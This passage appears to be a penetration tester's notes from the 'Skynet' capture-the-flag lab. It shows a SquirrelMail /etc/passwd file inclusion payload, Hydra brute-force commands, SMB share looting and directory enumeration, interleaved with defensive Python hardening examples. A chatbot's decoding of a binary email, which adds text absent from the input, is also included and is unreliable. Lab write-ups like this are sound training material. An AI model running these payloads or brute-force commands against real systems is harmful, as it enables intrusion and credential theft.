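    position: the tokens between '-f' and the trailing '-t'. A safe
    address yields exactly one token; anything more was injected."""
    tokens = shlex.split(build_sendmail_cmd_unsafe(sender))
    return tokens[3:-1]


def is_safe_sender(sender: str) -> bool:
    """Reject anything sendmail or a shell could read as more than one
    address: NUL bytes, whitespace, a leading '-', or a non-matching form."""
    if not sender or "\x00" in sender or sender.startswith("-"):
        return False
    if any(ch.isspace() for ch in sender):
        return False
    return _ADDR_RE.fullmatch(sender) is not None


def build_sendmail_argv(sender: str) -> list:
    """Hardened shape: validate first, then pass the address as its own
    argv element (to be run with subprocess.run(argv), never a shell), so
    '-f' consumes exactly that element and nothing else."""
    if not is_safe_sender(sender):
        raise ValueError(f"sender address rejected: {sender!r}")
    return [SENDMAIL, "-i", "-t", "-f", sender]


def rejects(sender: str) -> bool:
    """True when the hardened builder refuses the address."""
    try:
        build_sendmail_argv(sender)
    except ValueError:
        return True
    return False
```

The allowlist is deliberately narrower than RFC 5322 permits; for a webmail sender field that is the right trade, since the cost of a rejected exotic address is far lower than the cost of option injection into the local MTA.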
AND WE LOOK AT THIS OTHER, EXPLANATORY EXPLOIT:
┌──(root㉿kali)-[~]
└─# searchsploit -m php/webapps/27948.txt
Exploit: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/27948
Path: /usr/share/exploitdb/exploits/php/webapps/27948.txt
File Type: ASCII text
Copied to: /root/27948.txt
┌──(root㉿kali)-[~]
└─# ls
27948.txt Desktop Documents Downloads Music Pictures Public Templates Videos exploitpaimon.sh
┌──(root㉿kali)-[~]
└─# mv 27948.txt exploitpaimondos.txt
┌──(root㉿kali)-[~]
└─# cat exploitpaimondos.txt
source: https://www.securityfocus.com/bid/18231/info
SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.
http://www.example.com/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00
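The advisory text above describes the plugins[] local file inclusion but not the check whose absence makes it possible. As an added example, not from the writeup and not SquirrelMail's own code, the Python below places the vulnerable path join next to a hardened lookup that allowlists the plugin name, rejects NUL bytes (the reason the original report appends %00) and verifies that the normalised path still lies inside the plugins directory. The plugin directory, the function names and the sample names are assumptions made for the example.

```python
"""Added example (not from the writeup, not SquirrelMail code): the
path-containment check missing from a plugins[]-style include.
Directory and sample names are constructed."""
import re
import posixpath

PLUGIN_DIR = "/var/www/html/squirrelmail/plugins"  # assumed install path
_NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")          # a plugin name is one plain label


def plugin_path_unsafe(name: str) -> str:
    """Vulnerable shape: a bare string join, so '../' in the name walks out
    of PLUGIN_DIR and a NUL byte lets a C-level open() drop the suffix."""
    return PLUGIN_DIR + "/" + name + "/setup.php"


def escapes_plugin_dir(name: str) -> bool:
    """Show what the unsafe join resolves to: True when the normalised
    path no longer starts inside PLUGIN_DIR."""
    resolved = posixpath.normpath(plugin_path_unsafe(name))
    return not resolved.startswith(PLUGIN_DIR + posixpath.sep)


def plugin_path_safe(name: str):
    """Hardened shape: allowlist the name, refuse NUL bytes, then prove the
    normalised result stays under PLUGIN_DIR. Returns the path or None.
    posixpath is used so the check needs no filesystem; on a live system
    resolve symlinks with os.path.realpath before the prefix test."""
    if not name or "\x00" in name or not _NAME_RE.fullmatch(name):
        return None
    candidate = posixpath.normpath(posixpath.join(PLUGIN_DIR, name, "setup.php"))
    if not candidate.startswith(PLUGIN_DIR + posixpath.sep):
        return None
    return candidate
```

The allowlist alone would already block the traversal; the prefix test stays as defence in depth so that a later relaxation of the name pattern cannot silently reopen the hole.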
--------------- WE TRY TO CONNECT TO THE POP3 AND IMAP SERVICES WITHOUT CREDENTIALS; NEGATIVE -----
┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 110
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
+OK Dovecot ready.
-ERR Unknown command.
stat
-ERR Unknown command.
USER skynet
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
^C
exit
QUIT
Connection closed by foreign host.
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos exploitpaimon.sh exploitpaimondos.txt
┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 143
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
c1 LIST "" "*"
c1 BAD Error in IMAP command received by server.
c2 LOGIN guest
c2 BAD Error in IMAP command received by server.
QUIT
* BYE Too many invalid IMAP commands.
Connection closed by foreign host.
-------------- WE TRY TO CONNECT TO THE SAMBA SERVICES AND FIND SOMETHING ABOUT THE USER MILESDYSON ----
┌──(root㉿kali)-[~]
└─# smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
THE ONLY SHARE WE COULD CONNECT TO IS anonymous, AND BINGO, WE FOUND SOME INFORMATION WITHOUT NEEDING CREDENTIALS; WE DOWNLOADED attention.txt AND THE THREE log.txt FILES:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.190/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 07:20:17 2019
attention.txt N 163 Wed Sep 18 03:04:59 2019
logs D 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5830064 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> less attention.txt
less: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (79.6 KiloBytes/sec) (average 79.6 KiloBytes/sec)
smb: \> get logs
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \logs
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 04:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 04:42:13 2019
log1.txt N 471 Wed Sep 18 04:41:59 2019
log3.txt N 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5830064 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (230.0 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 123.8 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 103.2 KiloBytes/sec)
smb: \logs\>
WE READ THE FILES:
┌──(root㉿kali)-[~]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
WE CAT THE LOGS AND ONLY NUMBER 1 CONTAINED PASSWORDS:
┌──(root㉿kali)-[~]
└─# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
┌──(root㉿kali)-[~]
└─# cat log2.txt
┌──(root㉿kali)-[~]
└─# cat log3.txt
-------------------- BRUTE FORCE OF THE SQUIRRELMAIL SERVICE PASSWORD USING BURPSUITE SNIPER -----
Request  Payload                  Status  Error  Timeout  Length
12       terminator1056           0       false  true     0
16       terminator00             0       false  true     0
0        (none)                   200     false  false    3277
1        cyborg007haloterminator  200     false  false    3277
2        terminator22596          200     false  false    3277
3        terminator219            200     false  false    3277
4        terminator20             200     false  false    3277
5        terminator1989           200     false  false    3277
6        terminator1988           200     false  false    3277
7        terminator168            200     false  false    3277
8        terminator16             200     false  false    3277
9        terminator143            200     false  false    3277
10       terminator13             200     false  false    3277
11       terminator123!@#         200     false  false    3277
13       terminator101            200     false  false    3277
14       terminator10             200     false  false    3277
15       terminator02             200     false  false    3277
17       roboterminator           200     false  false    3277
18       pongterminator           200     false  false    3277
19       manasturcaluterminator   200     false  false    3277
20       exterminator95           200     false  false    3277
21       exterminator200          200     false  false    3277
22       dterminator              200     false  false    3277
23       djxterminator            200     false  false    3277
24       dexterminator            200     false  false    3277
25       determinator             200     false  false    3277
26       cyborg007haloterminator  200     false  false    3277
27       avsterminator            200     false  false    3277
28       alonsoterminator         200     false  false    3277
29       Walterminator            200     false  false    3277
30       79terminator6            200     false  false    3277
31       1996terminator           200     false  false    3277
WE SEE NOTHING THAT CATCHES OUR ATTENTION IN THE LENGTHS, ETC.
-------------------- BRUTE FORCE OF THE SQUIRRELMAIL SERVICE PASSWORD USING HYDRA -----
hydra -l miles -P passwdskynet.txt http://10.10.37.190/squirrelmail/src/login.php http-post-form "login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login ERROR"
hydra -l miles -P passwdskynet.txt http-post-form "http://10.10.37.190/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:incorrect"
┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"
THE COMMAND ALMOST WORKS; WE STILL HAVE TO IDENTIFY THE ERROR MESSAGE OF THE SquirrelMail version 1.4.23 [SVN] LOGIN CORRECTLY:
hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login ERROR"
hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"
hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>"
AFTER REFINING THE HYDRA COMMAND WE GOT THE LOGIN-FAILED DETECTION RIGHT AND MADE IT STOP AT THE FIRST MATCHING CORRECT PASSWORD, AND BINGO, WE OBTAINED THE CORRECT PASSWORD WITH HYDRA BY BRUTE-FORCING THE SQUIRRELMAIL LOGIN WITH THE USER MILES. The line ([STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)) in the output also helps us confirm that the line before it was the correct PASSWORD:
┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -stop
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 16:41:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103 login: miles password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 16:41:53
IMPORTANT RESULT:
[80][http-post-form] host: 10.10.37.103 login: miles password: cyborg007haloterminator
ALSO WITH THE USER MILESDYSON:
┌──(root㉿kali)-[~]
└─# hydra -l milesdyson -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 17:11:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103 login: milesdyson password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 17:11:53
IMPORTANT:
[80][http-post-form] host: 10.10.37.103 login: milesdyson password: cyborg007haloterminator
**********************
--------- WE STOPPED FOR LACK OF TIME, SO I'M WRITING A REMINDER OF WHAT TO CONTINUE WITH; OBVIOUSLY ONLY THE MACHINES' IPs WILL CHANGE ------
MILES'S PASSWORD, FOUND BY LOOKING AT THE RESPONSE LENGTH
miles:cyborg007haloterminator
KEEP TRYING THESE CREDENTIALS ON THE POP3 AND IMAP LOGINS OR SSH TOO, AND LOOK AT POLISHING HYDRA'S LOGIN-FAILED DETECTOR...!!!!
WE TRIED POP3: NEGATIVE, IT GAVE A TLS ERROR
WE TRIED IMAP: NEGATIVE, IT GAVE A TLS ERROR
WE TRIED SSH AND IT DOESN'T ACCEPT THE PASSWORD
TESTING THE CREDENTIALS IN SMBCLIENT:
PREVIOUS DATA:
smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
FOR NOW SMB DOESN'T ACCEPT THE CREDENTIALS MILES AND THAT PASSWORD
----------------------------
***********************
------------------------- SQUIRRELMAIL LOGIN --------------------------------
ALRIGHT, IT WORKED: WE TRIED THE LOGIN ON THE SQUIRRELMAIL SERVICE PANEL AGAIN, BUT WITH THE FOLLOWING CREDENTIALS, AND THIS TIME IT WORKED :D :
milesdyson:cyborg007haloterminator
http://10.10.37.103/squirrelmail/src/login.php
WEBSITE:
Current Folder: INBOX Sign Out
Compose Addresses Folders Options Search Help SquirrelMail
Toggle All Viewing Messages: 1 to 3 (3 total)
Move Selected To: Transform Selected Messages:
INBOX
From sort Date sort Subject sort
skynet@skynet Sep 17, 2019 Samba Password reset
serenakogan@skynet Sep 17, 2019 (no subject)
serenakogan@skynet Sep 17, 2019 (no subject)
Toggle All Viewing Messages: 1 to 3 (3 total)
-----
WE TRY TO READ THE INFORMATION IN THE PANEL:
MESSAGE FROM SKYNET@SKYNET, IT WORKED, WE HAVE ANOTHER PASSWORD:
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 9:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
----
MESSAGE FROM serenakogan@skynet: WE HAVE SOME KIND OF MESSAGE IN BINARY AND WE CONVERTED IT TO PLAIN TEXT WITH GPT:
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:16 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
PLAIN TEXT:
Sure, the code you provided is a sequence of bits that can be converted to text. The plain-text translation is:
balls have zero to me to me to me to me to me to me to
the balls have zero for me for me for me for me for me for me for
I hope this is helpful. If you have more questions or need help with anything else, don't hesitate to ask!
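Decoding the binary mail body without handing it to a chatbot, as an added Python example that is not part of the original notes: the bit groups below are the ones pasted from the message, re-embedded here as the sample input, and the decoder only splits on whitespace, so groups split across line breaks (like "hav" / "e") decode correctly. It also counts how many times the "to me" phrase actually repeats.

```python
"""Decode a whitespace-separated string of 8-bit binary groups into text.

Added example; the sample below is the message body copied from the
SquirrelMail inbox in these notes (constructed input for this script).
"""

# The binary message from serenakogan@skynet, exactly as pasted
# (line breaks fall mid-word, which is why we split on any whitespace).
BINARY_MESSAGE = """
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
"""


def decode_binary_groups(text: str, width: int = 8) -> str:
    """Turn groups like '01100010' into characters.

    Each group must be exactly `width` binary digits; anything else raises,
    which is better than silently producing garbage from a mangled paste.
    """
    chars = []
    for group in text.split():
        if len(group) != width or set(group) - {"0", "1"}:
            raise ValueError(f"bad binary group: {group!r}")
        chars.append(chr(int(group, 2)))
    return "".join(chars)


def count_phrase(decoded: str, phrase: str = "to me") -> int:
    """Count how many times a phrase repeats in the decoded text."""
    return decoded.count(phrase)


if __name__ == "__main__":
    plain = decode_binary_groups(BINARY_MESSAGE)
    print(plain)
    print(f"'{'to me'}' repeats {count_phrase(plain)} times")
```

The strict length check matters with copy-pasted data: a dropped or doubled digit shifts every following character, and an exception is far easier to notice than a plausible-looking but wrong string.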
------
MESSAGE FROM serenakogan@skynet: WE HAVE SOME KIND OF STRANGE MESSAGE RELATED TO THE PREVIOUS ONE, ALREADY IN PLAIN TEXT:
From: serenakogan@skynet
Date: Tue, September 17, 2019 2:13 am
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
FRAUDGPT SUPPOSEDLY READ IT FOR US; THE CLEANED-UP HIDDEN MESSAGE WOULD BE THIS:
I can have balls with me, you have zero with me, everything else.
-----
WE ANALYZE MORE PARTS OF THE PANEL; THERE IS ONE TO UPLOAD FILES AND SEND MAIL, ADD CONTACTS, CREATE FOLDERS AND MORE:
http://10.10.37.103/squirrelmail/src/compose.php?mailbox=INBOX&startMessage=1
http://10.10.37.103/squirrelmail/src/addressbook.php
http://10.10.37.103/squirrelmail/src/folders.php
---------------- EXPLOIT SCRIPT FOUND WITH SEARCHSPLOIT -------------------------
IT DIDN'T WORK WITH THE CREDENTIALS THAT HAD WORKED FOR US BEFORE:
---------------- SMBCLIENT ------------------------------
WE LOG IN TO MILESDYSON'S SHARE WITH THE PASSWORD FOUND IN THE MAIL MESSAGE FROM SKYNET@SKYNET AND IT WORKED; WE DOWNLOADED THE SEVERAL PDFs, NOTES AND DOCUMENTS THAT WERE THERE:
┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.103/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 09:05:47 2019
.. D 0 Wed Sep 18 03:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 09:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 09:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 09:05:14 2019
notes D 0 Tue Sep 17 09:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 09:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 09:05:14 2019
9204224 blocks of size 1024. 5831420 blocks available
smb: \> get Improving Deep Neural Networks.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Improving
smb: \> get "Improving Deep Neural Networks.pdf"
getting file \Improving Deep Neural Networks.pdf of size 5743095 as Improving Deep Neural Networks.pdf (91942.3 KiloBytes/sec) (average 91942.5 KiloBytes/sec)
smb: \> get "Natural Language Processing-Building Sequence Models.pdf"
getting file \Natural Language Processing-Building Sequence Models.pdf of size 12927230 as Natural Language Processing-Building Sequence Models.pdf (109776.0 KiloBytes/sec) (average 103595.1 KiloBytes/sec)
smb: \> get "Convolutional Neural Networks-CNN.pdf"
getting file \Convolutional Neural Networks-CNN.pdf of size 19655446 as Convolutional Neural Networks-CNN.pdf (127117.6 KiloBytes/sec) (average 114457.2 KiloBytes/sec)
smb: \> get "Neural Networks and Deep Learning.pdf"
getting file \Neural Networks and Deep Learning.pdf of size 4304586 as Neural Networks and Deep Learning.pdf (91384.5 KiloBytes/sec) (average 111611.8 KiloBytes/sec)
smb: \> get "Structuring your Machine Learning Project.pdf"
getting file \Structuring your Machine Learning Project.pdf of size 3531427 as Structuring your Machine Learning Project.pdf (98532.8 KiloBytes/sec) (average 110489.9 KiloBytes/sec)
smb: \> get notes
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \notes
smb: \> cd notes
smb: \notes\> pwd
Current directory is \\10.10.37.103\milesdyson\notes\
smb: \notes\> ls
. D 0 Tue Sep 17 09:18:40 2019
.. D 0 Tue Sep 17 09:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 09:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 09:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 09:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 09:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 09:01:29 2019
important.txt N 117 Tue Sep 17 09:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 09:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 09:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 09:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 09:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 09:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 09:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 09:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 09:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 09:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 09:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 09:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 09:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 09:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 09:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 09:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 09:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 09:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 09:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 09:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 09:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 09:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 09:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 09:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 09:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 09:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 09:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 09:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 09:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 09:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 09:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 09:01:29 2019
9204224 blocks of size 1024. 5831412 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (38.1 KiloBytes/sec) (average 109683.7 KiloBytes/sec)
smb: \notes\> get Search.md
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \notes\Search.md
WE READ AND LOOK AT THE DOWNLOADED FILES:
┌──(root㉿kali)-[~]
└─# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
WE CHECK ON THE WEB AND WHAT APPEARED IN THE MESSAGE WAS A PATH:
http://10.10.37.103/45kra24zxs28v3yd/
Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.
----
WE QUICKLY ANALYZED THE PDFs AND I DON'T SEE ANY IMPORTANT DRAFT NOTE SUCH AS A PASSWORD OR THE LIKE.
------------------------- GOBUSTER --------------------------
WE TRY TO FIND MORE PATHS STARTING FROM THE HIDDEN DIRECTORY FOUND IN MILESDYSON'S SMB SHARE:
gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
BINGO, OUR LOGIC WORKED; STARTING FROM THAT HIDDEN DIRECTORY GOBUSTER FOUND AN ADMINISTRATOR DIRECTORY :D :
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.103/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/03 18:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/administrator (Status: 301) [Size: 337] [--> http://10.10.37.103/45kra24zxs28v3yd/administrator/]
/index.html (Status: 200) [Size: 418]
===============================================================
2024/02/03 18:03:53 Finished
================================
BINGO, IT LED US TO A CUPPA CMS LOGIN; WE'LL TRY TO LOG IN WITH WHAT WE HAVE SO FAR:
http://10.10.37.103/45kra24zxs28v3yd/administrator/
WEB:
Use a valid username and password to gain access to the administrator
Username
Password
WE FOUND A COMMENTED-OUT PANEL FOR WHAT APPEARS TO BE A PASSWORD RECOVERY:
<!--
<a class="forgot_password" onclick="ShowPanel('forget')">Forgot Password?</a>
-->
WE TRIED UNCOMMENTING THIS <a> BUTTON AND THE BUTTON TO RECOVER THE PASSWORD APPEARS IN THE FORM, BUT WE CHECK THE SQUIRRELMAIL INBOX AND NOTHING HAS ARRIVED YET; LOOKING AT THE MAIL PANEL WE CONFIRM THAT WE ARE ENTERING OUR RECOVERY MAIL CORRECTLY, milesdyson@skynet, BUT THE PASSWORD MAIL STILL DOESN'T ARRIVE; WE TRIED AGAIN TO SEE IF ANYTHING ARRIVED VIA SSH, POP3, IMAP, SMB, AND NOTHING; SOMETHING ISN'T WORKING AS IT SHOULD WHEN RECOVERING THE PASSWORD:
Current Folder: INBOX Sign Out
Compose Addresses Folders Options Search Help SquirrelMail
Viewing Full Header - View message
Return-Path: <skynet@skynet>
X-Original-To: milesdyson
Delivered-To: milesdyson@skynet
Received: from localhost (localhost [127.0.0.1])
by skynet (Postfix) with SMTP id C1C36111
for <milesdyson>; Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
Subject: Samba Password reset
Message-Id: <20190918031102.C1C36111@skynet>
Date: Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
From: skynet@skynet
WE COULDN'T GET IT TO SEND US THE PASSWORD CHANGE MAIL... :(
-------------- TESTING THE EXPLOIT SCRIPT, AND MANUALLY THE LFI FILE INCLUSION, SUCCESSFULLY; WE READ THE FILE FROM THE BROWSER AND WITH CURL TOO -----
